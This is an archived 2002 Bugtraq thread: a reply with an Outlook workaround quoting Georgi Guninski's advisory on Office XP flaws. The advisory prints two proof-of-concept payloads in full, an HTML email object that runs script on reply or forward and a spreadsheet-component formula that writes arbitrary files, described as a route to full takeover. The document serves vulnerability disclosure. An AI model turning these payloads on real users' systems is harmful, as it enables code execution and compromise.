|
Bugtraq
mailing list archives
RE: More Office XP problems
From: Ben Schorr <bms () hawaiilawyer com>
Date: Wed, 3 Apr 2002 08:30:39 -1000
Worth noting that this problem (the Outlook part anyhow) appears to actually
be a Word vulnerability in that it only affects people who use the WordMail
editor. People who use the default Outlook editor are apparently not
affected by the forward/reply vulnerability.
http://www.slipstick.com for more info.
That's not to suggest that it isn't a vulnerability that shouldn't be fixed
- just that there appears to be a fairly easy workaround and not all users
are affected to begin with.
To work-around this problem in Outlook go to Tools | Options | Mail Format
and uncheck the boxes for "Use Word to..." That will cause Outlook to use
it's own native editor for such things and shuts the window on this exploit.
Aloha,
-Ben-
Ben M. Schorr, MVP-Outlook, CNA, MCPx3
Director of Information Services
Damon Key Leong Kupchak Hastert
http://www.hawaiilawyer.com
-----Original Message-----
From: Georgi Guninski [mailto:guninski () guninski com]
Sent: Sunday, March 31, 2002 2:32 AM
To: Bugtraq
Subject: More Office XP problems
Moderator: check the legal notice before submitting this to
some database.
Georgi Guninski security advisory #53, 2002
More Office XP problems
Systems affected:
Office XP
Risk: High
Date: 31 March 2002
Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it
without the author's written permission. If you want to link to this
content use the URL: http://www.guninski.com/m$oxp-2.html
Disclaimer:
The information in this advisory is believed to be true
though it may be false. The opinions expressed in this
advisory and program are my own and not of any company. The
usual standard disclaimer applies, especially the fact that
Georgi Guninski is not liable for any damages caused by
direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears
no responsibility for content or misuse of this advisory or
program or any derivatives thereof.
Description:
Actually there are at least two vulnerabilities in Office XP.
1. It is possible to embed active content (object + script)
in HTML mail which is triggered if the user choses reply or
forward to the mail. This opens an exploit scenario for
forcing the user to visit a page in the internet zone of IE
at least. For another exploit scenario check (2) 2. There is
a bug in ms spreadsheet compononent. Namely in its Host()
function which may be exploited with the help of (1) or
probably from any document opened with Office application.
This buggy function allows creating files with arbitrary
names and their content may be specified to some extent at
which is sufficient to place an executable file (.hta) in
user's startup directory which may lead to taking full
control over user's computer. This probably may be called
cross application scripting because one application uses
object from another application.
Details:
The following must be put in HTML email which should be
opened with Outlook XP and the user should chose reply or forward.
1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location"
VALUE="about:/dev/random<script>while (42)
alert('HOHOHO\nTrying to sell trustworthy
computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------
2.
The office spreadsheet component is something like mini
excel. It may be embeded in web pages (seems not exploitable)
and in office documents (seems exploitable). It supports the
Host() function which returns the hosting object. So if you
put in formula '=Host().SaveAs("name")' file with name shall
be created.
[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046"
id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml
version="1.0"?> <ss:Workbook
xmlns:o="urn:schemas-microsoft-com:office:office"
3;
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet&qu
ot;
xmlns:c="urn:schemas-microsoft-com:office:component:sprea
dsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
;
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles> <ss:Style
ss:ID="Default"> <ss:Alignment
ss:Horizontal="Automatic" ss:Rotate="0.0"
ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders> </ss:Borders>
<ss:Font ss:FontName="Arial"
ss:Size="10" ss:Color="Automatic"
ss:Bold="0" ss:Italic="0"
ss:Underline="None"/>
<ss:Interior ss:Color="Automatic"
ss:Pattern="None"/>
<ss:NumberFormat
ss:Format="General"/> <ss:Protection
ss:Protected="1"/>
</ss:Style> </ss:Styles>
<c:ComponentOptions>
<c:Label> <c:Caption>Microsoft Office
Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621
</c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions> <ss:Worksheet
ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible> &
#10;
<x:ProtectContents>False</x:ProtectContents> &
#10; </x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions> <ss:Table
ss:ExpandedColumnCount="1"
ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0"
ss:DefaultRowHeight="12.75">
<ss:Row> <ss:Cell
ss:Formula='=HOST().SaveAs("C:\GGGG5")'> 

; <ss:Data
ss:Type="Boolean">1</ss:Data>
</ss:Cell> </ss:Row>
</ss:Table> </ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible> &
#10;
<x:ProtectContents>False</x:ProtectContents> &
#10; </x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet> <ss:Worksheet
ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents> &
#10; </x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions> </ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents
HRef="file:///E:\"/>
</o:OfficeDocumentSettings> </ss:Workbook>
; ">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------
Workaround/Solution:
The solution is to get a real mail client and office
applications. Workaround for this particular problem is: For
(1) - disable everything that contains "active" in IE. For
(2) - (Have not tested it personally) Deregister and delete
the ms office spreadsheet component
Vendor status:
Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.
Regards,
Georgi Guninski
http://www.guninski.com
 By Date 
By Thread
Current thread:
- RE: More Office XP problems Ben Schorr (Apr 03)
|
Intro
